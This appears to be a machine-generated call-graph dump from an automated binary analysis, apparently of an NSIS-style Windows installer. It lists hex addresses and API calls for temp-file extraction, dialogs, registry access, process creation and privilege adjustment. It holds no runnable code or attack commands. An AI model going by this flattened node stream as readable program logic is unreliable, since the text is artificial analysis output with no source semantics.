3979->3980 3981 401676 3980->3981 3335 40336c SetErrorMode GetVersion 3336 4033ab 3335->3336 3337 4033b1 3335->3337 3338 406671 5 API calls 3336->3338 3339 406601 3 API calls 3337->3339 3338->3337 3340 4033c7 lstrlenA 3339->3340 3340->3337 3341 4033d7 3340->3341 3342 406671 5 API calls 3341->3342 3343 4033de 3342->3343 3344 406671 5 API calls 3343->3344 3345 4033e5 3344->3345 3346 406671 5 API calls 3345->3346 3347 4033f1 #17 OleInitialize SHGetFileInfoW 3346->3347 3425 406297 lstrcpynW 3347->3425 3350 40343d GetCommandLineW 3426 406297 lstrcpynW 3350->3426 3352 40344f 3353 405b99 CharNextW 3352->3353 3354 403474 CharNextW 3353->3354 3355 40359e GetTempPathW 3354->3355 3366 40348d 3354->3366 3427 40333b 3355->3427 3357 4035b6 3358 403610 DeleteFileW 3357->3358 3359 4035ba GetWindowsDirectoryW lstrcatW 3357->3359 3437 402edd GetTickCount GetModuleFileNameW 3358->3437 3362 40333b 12 API calls 3359->3362 3360 405b99 CharNextW 3360->3366 3363 4035d6 3362->3363 3363->3358 3365 4035da GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3363->3365 3364 403624 3367 4036db ExitProcess OleUninitialize 3364->3367 3377 405b99 CharNextW 3364->3377 3408 4036c7 3364->3408 3368 40333b 12 API calls 3365->3368 3366->3360 3369 403589 3366->3369 3370 403587 3366->3370 3371 403811 3367->3371 3372 4036f1 3367->3372 3375 403608 3368->3375 3521 406297 lstrcpynW 3369->3521 3370->3355 3373 403895 ExitProcess 3371->3373 3374 403819 GetCurrentProcess OpenProcessToken 3371->3374 3524 4058fd 3372->3524 3380 403831 LookupPrivilegeValueW AdjustTokenPrivileges 3374->3380 3381 403865 3374->3381 3375->3358 3375->3367 3392 403643 3377->3392 3380->3381 3385 406671 5 API calls 3381->3385 3382 4036d7 3382->3367 3388 40386c 3385->3388 3386 4036a1 3390 405c74 18 API calls 3386->3390 3387 403707 3389 405868 5 API calls 3387->3389 3391 403881 ExitWindowsEx 3388->3391 3395 40388e 3388->3395 3393 40370c lstrcatW 3389->3393 3394 4036ad 3390->3394 3391->3373 3391->3395 3392->3386 3392->3387 3396 403728 lstrcatW lstrcmpiW 3393->3396 3397 40371d lstrcatW 3393->3397 3394->3367 3522 406297 lstrcpynW 3394->3522 3530 40140b 3395->3530 3396->3367 3399 403744 3396->3399 3397->3396 3401 403750 3399->3401 3402 403749 3399->3402 3406 40584b 2 API calls 3401->3406 3404 4057ce 4 API calls 3402->3404 3403 4036bc 3523 406297 lstrcpynW 3403->3523 3407 40374e 3404->3407 3409 403755 SetCurrentDirectoryW 3406->3409 3407->3409 3465 403987 3408->3465 3410 403770 3409->3410 3411 403765 3409->3411 3529 406297 lstrcpynW 3410->3529 3528 406297 lstrcpynW 3411->3528 3414 4062b9 17 API calls 3415 4037af DeleteFileW 3414->3415 3416 4037bc CopyFileW 3415->3416 3422 40377e 3415->3422 3416->3422 3417 403805 3419 40605d 36 API calls 3417->3419 3418 40605d 36 API calls 3418->3422 3420 40380c 3419->3420 3420->3367 3421 4062b9 17 API calls 3421->3422 3422->3414 3422->3417 3422->3418 3422->3421 3423 405880 2 API calls 3422->3423 3424 4037f0 CloseHandle 3422->3424 3423->3422 3424->3422 3425->3350 3426->3352 3428 40652b 5 API calls 3427->3428 3430 403347 3428->3430 3429 403351 3429->3357 3430->3429 3431 405b6c 3 API calls 3430->3431 3432 403359 3431->3432 3433 40584b 2 API calls 3432->3433 3434 40335f 3433->3434 3533 405dbc 3434->3533 3537 405d8d GetFileAttributesW CreateFileW 3437->3537 3439 402f1d 3440 402f2d 3439->3440 3538 406297 lstrcpynW 3439->3538 3440->3364 3442 402f43 3443 405bb8 2 API calls 3442->3443 3444 402f49 3443->3444 3539 406297 lstrcpynW 3444->3539 3446 402f54 GetFileSize 3461 403050 3446->3461 3464 402f6b 3446->3464 3448 403059 3448->3440 3450 403089 GlobalAlloc 3448->3450 3552 403324 SetFilePointer 3448->3552 3449 40330e ReadFile 3449->3464 3551 403324 SetFilePointer 3450->3551 3452 4030bc 3456 402e79 6 API calls 3452->3456 3454 403072 3457 40330e ReadFile 3454->3457 3455 4030a4 3458 403116 31 API calls 3455->3458 3456->3440 3459 40307d 3457->3459 3462 4030b0 3458->3462 3459->3440 3459->3450 3460 402e79 6 API calls 3460->3464 3540 402e79 3461->3540 3462->3440 3462->3462 3463 4030ed SetFilePointer 3462->3463 3463->3440 3464->3440 3464->3449 3464->3452 3464->3460 3464->3461 3466 406671 5 API calls 3465->3466 3467 40399b 3466->3467 3468 4039a1 3467->3468 3469 4039b3 3467->3469 3568 4061de wsprintfW 3468->3568 3470 406165 3 API calls 3469->3470 3471 4039e3 3470->3471 3472 403a02 lstrcatW 3471->3472 3475 406165 3 API calls 3471->3475 3474 4039b1 3472->3474 3553 403c5d 3474->3553 3475->3472 3478 405c74 18 API calls 3479 403a34 3478->3479 3480 403ac8 3479->3480 3483 406165 3 API calls 3479->3483 3481 405c74 18 API calls 3480->3481 3482 403ace 3481->3482 3484 403ade LoadImageW 3482->3484 3486 4062b9 17 API calls 3482->3486 3485 403a66 3483->3485 3487 403b84 3484->3487 3488 403b05 RegisterClassW 3484->3488 3485->3480 3489 403a87 lstrlenW 3485->3489 3492 405b99 CharNextW 3485->3492 3486->3484 3491 40140b 2 API calls 3487->3491 3490 403b3b SystemParametersInfoW CreateWindowExW 3488->3490 3520 403b8e 3488->3520 3493 403a95 lstrcmpiW 3489->3493 3494 403abb 3489->3494 3490->3487 3495 403b8a 3491->3495 3496 403a84 3492->3496 3493->3494 3497 403aa5 GetFileAttributesW 3493->3497 3498 405b6c 3 API calls 3494->3498 3500 403c5d 18 API calls 3495->3500 3495->3520 3496->3489 3499 403ab1 3497->3499 3501 403ac1 3498->3501 3499->3494 3502 405bb8 2 API calls 3499->3502 3503 403b9b 3500->3503 3569 406297 lstrcpynW 3501->3569 3502->3494 3505 403ba7 ShowWindow 3503->3505 3506 403c2a 3503->3506 3508 406601 3 API calls 3505->3508 3561 4053d2 OleInitialize 3506->3561 3510 403bbf 3508->3510 3509 403c30 3512 403c34 3509->3512 3513 403c4c 3509->3513 3511 403bcd GetClassInfoW 3510->3511 3514 406601 3 API calls 3510->3514 3516 403be1 GetClassInfoW RegisterClassW 3511->3516 3517 403bf7 DialogBoxParamW 3511->3517 3519 40140b 2 API calls 3512->3519 3512->3520 3515 40140b 2 API calls 3513->3515 3514->3511 3515->3520 3516->3517 3518 40140b 2 API calls 3517->3518 3518->3520 3519->3520 3520->3382 3521->3370 3522->3403 3523->3408 3526 405912 3524->3526 3525 4036ff ExitProcess 3526->3525 3527 405926 MessageBoxIndirectW 3526->3527 3527->3525 3528->3410 3529->3422 3531 401389 2 API calls 3530->3531 3532 401420 3531->3532 3532->3373 3534 405dc9 GetTickCount GetTempFileNameW 3533->3534 3535 40336a 3534->3535 3536 405dff 3534->3536 3535->3357 3536->3534 3536->3535 3537->3439 3538->3442 3539->3446 3541 402e82 3540->3541 3542 402e9a 3540->3542 3543 402e92 3541->3543 3544 402e8b DestroyWindow 3541->3544 3545 402ea2 3542->3545 3546 402eaa GetTickCount 3542->3546 3543->3448 3544->3543 3547 4066ad 2 API calls 3545->3547 3548 402eb8 CreateDialogParamW ShowWindow 3546->3548 3549 402edb 3546->3549 3550 402ea8 3547->3550 3548->3549 3549->3448 3550->3448 3551->3455 3552->3454 3554 403c71 3553->3554 3570 4061de wsprintfW 3554->3570 3556 403ce2 3571 403d16 3556->3571 3558 403a12 3558->3478 3559 403ce7 3559->3558 3560 4062b9 17 API calls 3559->3560 3560->3559 3574 40425a 3561->3574 3563 40425a SendMessageW 3564 40542e OleUninitialize 3563->3564 3564->3509 3566 40541c 3566->3563 3567 4053f5 3567->3566 3577 401389 3567->3577 3568->3474 3569->3480 3570->3556 3572 4062b9 17 API calls 3571->3572 3573 403d24 SetWindowTextW 3572->3573 3573->3559 3575 404272 3574->3575 3576 404263 SendMessageW 3574->3576 3575->3567 3576->3575 3579 401390 3577->3579 3578 4013fe 3578->3567 3579->3578 3580 4013cb MulDiv SendMessageW 3579->3580 3580->3579 3982 4052ec CallWindowProcW 3983 4052f9 3982->3983 3602 40176f 3603 402c41 17 API calls 3602->3603 3604 401776 3603->3604 3605 401796 3604->3605 3606 40179e 3604->3606 3641 406297 lstrcpynW 3605->3641 3642 406297 lstrcpynW 3606->3642 3609 40179c 3613 40652b 5 API calls 3609->3613 3610 4017a9 3611 405b6c 3 API calls 3610->3611 3612 4017af lstrcatW 3611->3612 3612->3609 3629 4017bb 3613->3629 3614 4065da 2 API calls 3614->3629 3615 405d68 2 API calls 3615->3629 3617 4017cd CompareFileTime 3617->3629 3618 40188d 3620 4052ff 24 API calls 3618->3620 3619 401864 3621 4052ff 24 API calls 3619->3621 3631 401879 3619->3631 3623 401897 3620->3623 3621->3631 3622 406297 lstrcpynW 3622->3629 3624 403116 31 API calls 3623->3624 3625 4018aa 3624->3625 3626 4018be SetFileTime 3625->3626 3628 4018d0 FindCloseChangeNotification 3625->3628 3626->3628 3627 4062b9 17 API calls 3627->3629 3630 4018e1 3628->3630 3628->3631 3629->3614 3629->3615 3629->3617 3629->3618 3629->3619 3629->3622 3629->3627 3637 4058fd MessageBoxIndirectW 3629->3637 3640 405d8d GetFileAttributesW CreateFileW 3629->3640 3632 4018e6 3630->3632 3633 4018f9 3630->3633 3635 4062b9 17 API calls 3632->3635 3634 4062b9 17 API calls 3633->3634 3636 401901 3634->3636 3638 4018ee lstrcatW 3635->3638 3639 4058fd MessageBoxIndirectW 3636->3639 3637->3629 3638->3636 3639->3631 3640->3629 3641->3609 3642->3610 3984 4027ef 3985 4027f6 3984->3985 3987 402a70 3984->3987 3986 402c1f 17 API calls 3985->3986 3988 4027fd 3986->3988 3989 40280c SetFilePointer 3988->3989 3989->3987 3990 40281c 3989->3990 3992 4061de wsprintfW 3990->3992 3992->3987 3993 401a72 3994 402c1f 17 API calls 3993->3994 3995 401a7b 3994->3995 3996 402c1f 17 API calls 3995->3996 3997 401a20 3996->3997 3643 401573 3644 401583 ShowWindow 3643->3644 3645 40158c 3643->3645 3644->3645 3646 40159a ShowWindow 3645->3646 3647 402ac5 3645->3647 3646->3647 3998 402df3 3999 402e05 SetTimer 3998->3999 4000 402e1e 3998->4000 3999->4000 4001 402e73 4000->4001 4002 402e38 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4000->4002 4002->4001 4003 401cf3 4004 402c1f 17 API calls 4003->4004 4005 401cf9 IsWindow 4004->4005 4006 401a20 4005->4006 4007 4014f5 SetForegroundWindow 4008 402ac5 4007->4008 4009 402576 4010 402c41 17 API calls 4009->4010 4011 40257d 4010->4011 4014 405d8d GetFileAttributesW CreateFileW 4011->4014 4013 402589 4014->4013 4015 401b77 4016 401b84 4015->4016 4017 401bc8 4015->4017 4018 4022e4 4016->4018 4024 401b9b 4016->4024 4019 401bf2 GlobalAlloc 4017->4019 4020 401bcd 4017->4020 4022 4062b9 17 API calls 4018->4022 4021 4062b9 17 API calls 4019->4021 4030 401c0d 4020->4030 4036 406297 lstrcpynW 4020->4036 4021->4030 4023 4022f1 4022->4023 4028 4058fd MessageBoxIndirectW 4023->4028 4034 406297 lstrcpynW 4024->4034 4027 401bdf GlobalFree 4027->4030 4028->4030 4029 401baa 4035 406297 lstrcpynW 4029->4035 4032 401bb9 4037 406297 lstrcpynW 4032->4037 4034->4029 4035->4032 4036->4027 4037->4030 3742 4024f8 3743 402c81 17 API calls 3742->3743 3744 402502 3743->3744 3745 402c1f 17 API calls 3744->3745 3746 40250b 3745->3746 3747 402533 RegEnumValueW 3746->3747 3748 402527 RegEnumKeyW 3746->3748 3751 40288b 3746->3751 3749 40254f RegCloseKey 3747->3749 3750 402548 3747->3750 3748->3749 3749->3751 3750->3749 4038 40167b 4039 402c41 17 API calls 4038->4039 4040 401682 4039->4040 4041 402c41 17 API calls 4040->4041 4042 40168b 4041->4042 4043 402c41 17 API calls 4042->4043 4044 401694 MoveFileW 4043->4044 4045 4016a7 4044->4045 4051 4016a0 4044->4051 4047 4065da 2 API calls 4045->4047 4049 402250 4045->4049 4046 401423 24 API calls 4046->4049 4048 4016b6 4047->4048 4048->4049 4050 40605d 36 API calls 4048->4050 4050->4051 4051->4046 4052 404c7b GetDlgItem GetDlgItem 4053 404ccd 7 API calls 4052->4053 4059 404ee6 4052->4059 4054 404d70 DeleteObject 4053->4054 4055 404d63 SendMessageW 4053->4055 4056 404d79 4054->4056 4055->4054 4057 404db0 4056->4057 4058 4062b9 17 API calls 4056->4058 4060 40420e 18 API calls 4057->4060 4062 404d92 SendMessageW SendMessageW 4058->4062 4066 404fca 4059->4066 4087 404f57 4059->4087 4105 404bc9 SendMessageW 4059->4105 4065 404dc4 4060->4065 4061 405076 4063 405080 SendMessageW 4061->4063 4064 405088 4061->4064 4062->4056 4063->4064 4073 4050a1 4064->4073 4074 40509a ImageList_Destroy 4064->4074 4090 4050b1 4064->4090 4070 40420e 18 API calls 4065->4070 4066->4061 4071 405023 SendMessageW 4066->4071 4092 404ed9 4066->4092 4067 404275 8 API calls 4072 40526c 4067->4072 4068 404fbc SendMessageW 4068->4066 4089 404dd2 4070->4089 4075 405038 SendMessageW 4071->4075 4071->4092 4076 4050aa GlobalFree 4073->4076 4073->4090 4074->4073 4078 40504b 4075->4078 4076->4090 4077 404ea7 GetWindowLongW SetWindowLongW 4080 404ec0 4077->4080 4091 40505c SendMessageW 4078->4091 4079 405220 4081 405232 ShowWindow GetDlgItem ShowWindow 4079->4081 4079->4092 4082 404ec6 ShowWindow 4080->4082 4083 404ede 4080->4083 4081->4092 4103 404243 SendMessageW 4082->4103 4104 404243 SendMessageW 4083->4104 4084 404ea1 4084->4077 4084->4080 4087->4066 4087->4068 4088 404e22 SendMessageW 4088->4089 4089->4077 4089->4084 4089->4088 4093 404e5e SendMessageW 4089->4093 4094 404e6f SendMessageW 4089->4094 4090->4079 4099 4050ec 4090->4099 4110 404c49 4090->4110 4091->4061 4092->4067 4093->4089 4094->4089 4096 4051f6 InvalidateRect 4096->4079 4097 40520c 4096->4097 4119 404b84 4097->4119 4098 40511a SendMessageW 4102 405130 4098->4102 4099->4098 4099->4102 4101 4051a4 SendMessageW SendMessageW 4101->4102 4102->4096 4102->4101 4103->4092 4104->4059 4106 404c28 SendMessageW 4105->4106 4107 404bec GetMessagePos ScreenToClient SendMessageW 4105->4107 4108 404c20 4106->4108 4107->4108 4109 404c25 4107->4109 4108->4087 4109->4106 4122 406297 lstrcpynW 4110->4122 4112 404c5c 4123 4061de wsprintfW 4112->4123 4114 404c66 4115 40140b 2 API calls 4114->4115 4116 404c6f 4115->4116 4124 406297 lstrcpynW 4116->4124 4118 404c76 4118->4099 4125 404abb 4119->4125 4121 404b99 4121->4079 4122->4112 4123->4114 4124->4118 4126 404ad4 4125->4126 4127 4062b9 17 API calls 4126->4127 4128 404b38 4127->4128 4129 4062b9 17 API calls 4128->4129 4130 404b43 4129->4130 4131 4062b9 17 API calls 4130->4131 4132 404b59 lstrlenW wsprintfW SetDlgItemTextW 4131->4132 4132->4121 4133 401e7d 4134 402c41 17 API calls 4133->4134 4135 401e83 4134->4135 4136 402c41 17 API calls 4135->4136 4137 401e8c 4136->4137 4138 402c41 17 API calls 4137->4138 4139 401e95 4138->4139 4140 402c41 17 API calls 4139->4140 4141 401e9e 4140->4141 4142 401423 24 API calls 4141->4142 4143 401ea5 4142->4143 4150 4058c3 ShellExecuteExW 4143->4150 4145 401ee7 4146 406722 5 API calls 4145->4146 4148 40288b 4145->4148 4147 401f01 CloseHandle 4146->4147 4147->4148 4150->4145 4151 40437e lstrlenW 4152 40439d 4151->4152 4153 40439f WideCharToMultiByte 4151->4153 4152->4153 4154 4019ff 4155 402c41 17 API calls 4154->4155 4156 401a06 4155->4156 4157 402c41 17 API calls 4156->4157 4158 401a0f 4157->4158 4159 401a16 lstrcmpiW 4158->4159 4160 401a28 lstrcmpW 4158->4160 4161 401a1c 4159->4161 4160->4161 4162 4046ff 4163 40472b 4162->4163 4164 40473c 4162->4164 4223 4058e1 GetDlgItemTextW 4163->4223 4166 404748 GetDlgItem 4164->4166 4173 4047a7 4164->4173 4168 40475c 4166->4168 4167 404736 4170 40652b 5 API calls 4167->4170 4171 404770 SetWindowTextW 4168->4171 4176 405c17 4 API calls 4168->4176 4169 40488b 4172 404a3a 4169->4172 4225 4058e1 GetDlgItemTextW 4169->4225 4170->4164 4177 40420e 18 API calls 4171->4177 4175 404275 8 API calls 4172->4175 4173->4169 4173->4172 4178 4062b9 17 API calls 4173->4178 4183 404a4e 4175->4183 4184 404766 4176->4184 4180 40478c 4177->4180 4181 40481b SHBrowseForFolderW 4178->4181 4179 4048bb 4182 405c74 18 API calls 4179->4182 4185 40420e 18 API calls 4180->4185 4181->4169 4186 404833 CoTaskMemFree 4181->4186 4187 4048c1 4182->4187 4184->4171 4190 405b6c 3 API calls 4184->4190 4188 40479a 4185->4188 4189 405b6c 3 API calls 4186->4189 4226 406297 lstrcpynW 4187->4226 4224 404243 SendMessageW 4188->4224 4192 404840 4189->4192 4190->4171 4195 404877 SetDlgItemTextW 4192->4195 4199 4062b9 17 API calls 4192->4199 4194 4047a0 4197 406671 5 API calls 4194->4197 4195->4169 4196 4048d8 4198 406671 5 API calls 4196->4198 4197->4173 4206 4048df 4198->4206 4200 40485f lstrcmpiW 4199->4200 4200->4195 4203 404870 lstrcatW 4200->4203 4201 404920 4227 406297 lstrcpynW 4201->4227 4203->4195 4204 404927 4205 405c17 4 API calls 4204->4205 4207 40492d GetDiskFreeSpaceW 4205->4207 4206->4201 4210 405bb8 2 API calls 4206->4210 4212 404978 4206->4212 4209 404951 MulDiv 4207->4209 4207->4212 4209->4212 4210->4206 4211 4049e9 4214 404a0c 4211->4214 4216 40140b 2 API calls 4211->4216 4212->4211 4213 404b84 20 API calls 4212->4213 4215 4049d6 4213->4215 4228 404230 KiUserCallbackDispatcher 4214->4228 4218 4049eb SetDlgItemTextW 4215->4218 4219 4049db 4215->4219 4216->4214 4218->4211 4221 404abb 20 API calls 4219->4221 4220 404a28 4220->4172 4222 404658 SendMessageW 4220->4222 4221->4211 4222->4172 4223->4167 4224->4194 4225->4179 4226->4196 4227->4204 4228->4220 4229 401000 4230 401037 BeginPaint GetClientRect 4229->4230 4231 40100c DefWindowProcW 4229->4231 4233 4010f3 4230->4233 4234 401179 4231->4234 4235 401073 CreateBrushIndirect FillRect DeleteObject 4233->4235 4236 4010fc 4233->4236 4235->4233 4237 401102 CreateFontIndirectW 4236->4237 4238 401167 EndPaint 4236->4238 4237->4238 4239 401112 6 API calls 4237->4239 4238->4234 4239->4238 4240 401503 4241 40150b 4240->4241 4243 40151e 4240->4243 4242 402c1f 17 API calls 4241->4242 4242->4243 3282 402484 3293 402c81 3282->3293 3285 402c41 17 API calls 3286 402497 3285->3286 3287 4024a2 RegQueryValueExW 3286->3287 3292 40288b 3286->3292 3288 4024c8 RegCloseKey 3287->3288 3289 4024c2 3287->3289 3288->3292 3289->3288 3298 4061de wsprintfW 3289->3298 3294 402c41 17 API calls 3293->3294 3295 402c98 3294->3295 3296 406104 RegOpenKeyExW 3295->3296 3297 40248e 3296->3297 3297->3285 3298->3288 4244 402104 4245 402c41 17 API calls 4244->4245 4246 40210b 4245->4246 4247 402c41 17 API calls 4246->4247 4248 402115 4247->4248 4249 402c41 17 API calls 4248->4249 4250 40211f 4249->4250 4251 402c41 17 API calls 4250->4251 4252 402129 4251->4252 4253 402c41 17 API calls 4252->4253 4255 402133 4253->4255 4254 402172 CoCreateInstance 4259 402191 4254->4259 4255->4254 4256 402c41 17 API calls 4255->4256 4256->4254 4257 401423 24 API calls 4258 402250 4257->4258 4259->4257 4259->4258 3299 401f06 3300 402c41 17 API calls 3299->3300 3301 401f0c 3300->3301 3302 4052ff 24 API calls 3301->3302 3303 401f16 3302->3303 3314 405880 CreateProcessW 3303->3314 3306 401f3f CloseHandle 3310 40288b 3306->3310 3309 401f31 3311 401f41 3309->3311 3312 401f36 3309->3312 3311->3306 3322 4061de wsprintfW 3312->3322 3315 4058b3 CloseHandle 3314->3315 3316 401f1c 3314->3316 3315->3316 3316->3306 3316->3310 3317 406722 WaitForSingleObject 3316->3317 3318 40673c 3317->3318 3319 40674e GetExitCodeProcess 3318->3319 3323 4066ad 3318->3323 3319->3309 3322->3306 3324 4066ca PeekMessageW 3323->3324 3325 4066c0 DispatchMessageW 3324->3325 3326 4066da WaitForSingleObject 3324->3326 3325->3324 3326->3318 4260 405286 4261 40425a SendMessageW 4260->4261 4262 405293 4261->4262 3581 40230c 3582 402314 3581->3582 3583 40231a 3581->3583 3585 402c41 17 API calls 3582->3585 3584 402328 3583->3584 3586 402c41 17 API calls 3583->3586 3587 402336 3584->3587 3588 402c41 17 API calls 3584->3588 3585->3583 3586->3584 3589 402c41 17 API calls 3587->3589 3588->3587 3590 40233f WritePrivateProfileStringW 3589->3590 4263 40190c 4264 401943 4263->4264 4265 402c41 17 API calls 4264->4265 4266 401948 4265->4266 4267 4059a9 67 API calls 4266->4267 4268 401951 4267->4268 4269 401f8c 4270 402c41 17 API calls 4269->4270 4271 401f93 4270->4271 4272 406671 5 API calls 4271->4272 4273 401fa2 4272->4273 4274 402026 4273->4274 4275 401fbe GlobalAlloc 4273->4275 4275->4274 4276 401fd2 4275->4276 4277 406671 5 API calls 4276->4277 4278 401fd9 4277->4278 4279 406671 5 API calls 4278->4279 4280 401fe3 4279->4280 4280->4274 4284 4061de wsprintfW 4280->4284 4282 402018 4285 4061de wsprintfW 4282->4285 4284->4282 4285->4274 4286 40238e 4287 4023c1 4286->4287 4288 402396 4286->4288 4290 402c41 17 API calls 4287->4290 4289 402c81 17 API calls 4288->4289 4291 40239d 4289->4291 4292 4023c8 4290->4292 4294 402c41 17 API calls 4291->4294 4296 4023d5 4291->4296 4297 402cff 4292->4297 4295 4023ae RegDeleteValueW RegCloseKey 4294->4295 4295->4296 4298 402d13 4297->4298 4299 402d0c 4297->4299 4298->4299 4301 402d44 4298->4301 4299->4296 4302 406104 RegOpenKeyExW 4301->4302 4303 402d72 4302->4303 4304 402d98 RegEnumKeyW 4303->4304 4305 402daf RegCloseKey 4303->4305 4307 402dd0 RegCloseKey 4303->4307 4309 402d44 6 API calls 4303->4309 4311 402dc3 4303->4311 4304->4303 4304->4305 4306 406671 5 API calls 4305->4306 4308 402dbf 4306->4308 4307->4311 4310 402de0 RegDeleteKeyW 4308->4310 4308->4311 4309->4303 4310->4311 4311->4299 4312 40190f 4313 402c41 17 API calls 4312->4313 4314 401916 4313->4314 4315 4058fd MessageBoxIndirectW 4314->4315 4316 40191f 4315->4316 4317 401491 4318 4052ff 24 API calls 4317->4318 4319 401498 4318->4319 4320 401d14 4321 402c1f 17 API calls 4320->4321 4322 401d1b 4321->4322 4323 402c1f 17 API calls 4322->4323 4324 401d27 GetDlgItem 4323->4324 4325 402592 4324->4325 4326 402897 4327 4028a0 4326->4327 4331 4061de wsprintfW 4326->4331 4332 406297 lstrcpynW 4327->4332 4330 4029e6 4331->4327 4332->4330 4333 402598 4334 4025c7 4333->4334 4335 4025ac 4333->4335 4336 4025fb 4334->4336 4337 4025cc 4334->4337 4338 402c1f 17 API calls 4335->4338 4340 402c41 17 API calls 4336->4340 4339 402c41 17 API calls 4337->4339 4345 4025b3 4338->4345 4341 4025d3 WideCharToMultiByte lstrlenA 4339->4341 4342 402602 lstrlenW 4340->4342 4341->4345 4342->4345 4343 40262f 4344 402645 4343->4344 4346 405e3f WriteFile 4343->4346 4345->4343 4345->4344 4347 405e6e 5 API calls 4345->4347 4346->4344 4347->4343 4348 40149e 4349 4022f7 4348->4349 4350 4014ac PostQuitMessage 4348->4350 4350->4349 4351 401c1f 4352 402c1f 17 API calls 4351->4352 4353 401c26 4352->4353 4354 402c1f 17 API calls 4353->4354 4355 401c33 4354->4355 4356 401c48 4355->4356 4358 402c41 17 API calls 4355->4358 4357 401c58 4356->4357 4359 402c41 17 API calls 4356->4359 4360 401c63 4357->4360 4361 401caf 4357->4361 4358->4356 4359->4357 4362 402c1f 17 API calls 4360->4362 4363 402c41 17 API calls 4361->4363 4364 401c68 4362->4364 4365 401cb4 4363->4365 4367 402c1f 17 API calls 4364->4367 4366 402c41 17 API calls 4365->4366 4368 401cbd FindWindowExW 4366->4368 4369 401c74 4367->4369 4372 401cdf 4368->4372 4370 401c81 SendMessageTimeoutW 4369->4370 4371 401c9f SendMessageW 4369->4371 4370->4372 4371->4372 4373 402aa0 SendMessageW 4374 402ac5 4373->4374 4375 402aba InvalidateRect 4373->4375 4375->4374 4376 402821 4377 402827 4376->4377 4378 402ac5 4377->4378 4379 40282f FindClose 4377->4379 4379->4378 3226 4015a3 3227 402c41 17 API calls 3226->3227 3228 4015aa SetFileAttributesW 3227->3228 3229 4015bc 3228->3229 4380 4029a8 4381 402c1f 17 API calls 4380->4381 4382 4029ae 4381->4382 4383 4029d5 4382->4383 4384 4029ee 4382->4384 4390 40288b 4382->4390 4385 4029da 4383->4385 4393 4029eb 4383->4393 4386 402a08 4384->4386 4387 4029f8 4384->4387 4394 406297 lstrcpynW 4385->4394 4389 4062b9 17 API calls 4386->4389 4388 402c1f 17 API calls 4387->4388 4388->4393 4389->4393 4393->4390 4395 4061de wsprintfW 4393->4395 4394->4390 4395->4390 3591 4038ad 3592 4038c5 3591->3592 3593 4038b7 CloseHandle 3591->3593 3598 4038f2 3592->3598 3593->3592 3596 4059a9 67 API calls 3597 4038d6 3596->3597 3599 403900 3598->3599 3600 4038ca 3599->3600 3601 403905 FreeLibrary GlobalFree 3599->3601 3600->3596 3601->3600 3601->3601 4396 4028ad 4397 402c41 17 API calls 4396->4397 4399 4028bb 4397->4399 4398 4028d1 4401 405d68 2 API calls 4398->4401 4399->4398 4400 402c41 17 API calls 4399->4400 4400->4398 4402 4028d7 4401->4402 4424 405d8d GetFileAttributesW CreateFileW 4402->4424 4404 4028e4 4405 4028f0 GlobalAlloc 4404->4405 4406 402987 4404->4406 4407 402909 4405->4407 4408 40297e CloseHandle 4405->4408 4409 4029a2 4406->4409 4410 40298f DeleteFileW 4406->4410 4425 403324 SetFilePointer 4407->4425 4408->4406 4410->4409 4412 40290f 4413 40330e ReadFile 4412->4413 4414 402918 GlobalAlloc 4413->4414 4415 402928 4414->4415 4416 40295c 4414->4416 4417 403116 31 API calls 4415->4417 4418 405e3f WriteFile 4416->4418 4423 402935 4417->4423 4419 402968 GlobalFree 4418->4419 4420 403116 31 API calls 4419->4420 4421 40297b 4420->4421 4421->4408 4422 402953 GlobalFree 4422->4416 4423->4422 4424->4404 4425->4412 4426 401a30 4427 402c41 17 API calls 4426->4427 4428 401a39 ExpandEnvironmentStringsW 4427->4428 4429 401a4d 4428->4429 4431 401a60 4428->4431 4430 401a52 lstrcmpW 4429->4430 4429->4431 4430->4431 4432 402032 4433 402044 4432->4433 4434 4020f6 4432->4434 4435 402c41 17 API calls 4433->4435 4436 401423 24 API calls 4434->4436 4437 40204b 4435->4437 4443 402250 4436->4443 4438 402c41 17 API calls 4437->4438 4439 402054 4438->4439 4440 40206a LoadLibraryExW 4439->4440 4441 40205c GetModuleHandleW 4439->4441 4440->4434 4442 40207b 4440->4442 4441->4440 4441->4442 4452 4066e0 WideCharToMultiByte 4442->4452 4446 4020c5 4448 4052ff 24 API calls 4446->4448 4447 40208c 4449 401423 24 API calls 4447->4449 4450 40209c 4447->4450 4448->4450 4449->4450 4450->4443 4451 4020e8 FreeLibrary 4450->4451 4451->4443 4453 40670a GetProcAddress 4452->4453 4454 402086 4452->4454 4453->4454 4454->4446 4454->4447 3648 403d35 3649 403e88 3648->3649 3650 403d4d 3648->3650 3652 403ed9 3649->3652 3653 403e99 GetDlgItem GetDlgItem 3649->3653 3650->3649 3651 403d59 3650->3651 3655 403d64 SetWindowPos 3651->3655 3656 403d77 3651->3656 3654 403f33 3652->3654 3665 401389 2 API calls 3652->3665 3657 40420e 18 API calls 3653->3657 3659 40425a SendMessageW 3654->3659 3666 403e83 3654->3666 3655->3656 3660 403d94 3656->3660 3661 403d7c ShowWindow 3656->3661 3658 403ec3 SetClassLongW 3657->3658 3662 40140b 2 API calls 3658->3662 3686 403f45 3659->3686 3663 403db6 3660->3663 3664 403d9c DestroyWindow 3660->3664 3661->3660 3662->3652 3668 403dbb SetWindowLongW 3663->3668 3669 403dcc 3663->3669 3667 404197 3664->3667 3670 403f0b 3665->3670 3667->3666 3676 4041c8 ShowWindow 3667->3676 3668->3666 3672 403e75 3669->3672 3673 403dd8 GetDlgItem 3669->3673 3670->3654 3674 403f0f SendMessageW 3670->3674 3671 404199 DestroyWindow EndDialog 3671->3667 3728 404275 3672->3728 3677 403e08 3673->3677 3678 403deb SendMessageW IsWindowEnabled 3673->3678 3674->3666 3675 40140b 2 API calls 3675->3686 3676->3666 3681 403e15 3677->3681 3683 403e5c SendMessageW 3677->3683 3684 403e28 3677->3684 3692 403e0d 3677->3692 3678->3666 3678->3677 3680 4062b9 17 API calls 3680->3686 3681->3683 3681->3692 3683->3672 3687 403e30 3684->3687 3688 403e45 3684->3688 3685 403e43 3685->3672 3686->3666 3686->3671 3686->3675 3686->3680 3689 40420e 18 API calls 3686->3689 3710 4040d9 DestroyWindow 3686->3710 3719 40420e 3686->3719 3691 40140b 2 API calls 3687->3691 3690 40140b 2 API calls 3688->3690 3689->3686 3693 403e4c 3690->3693 3691->3692 3725 4041e7 3692->3725 3693->3672 3693->3692 3695 403fc0 GetDlgItem 3696 403fd5 3695->3696 3697 403fdd ShowWindow KiUserCallbackDispatcher 3695->3697 3696->3697 3722 404230 KiUserCallbackDispatcher 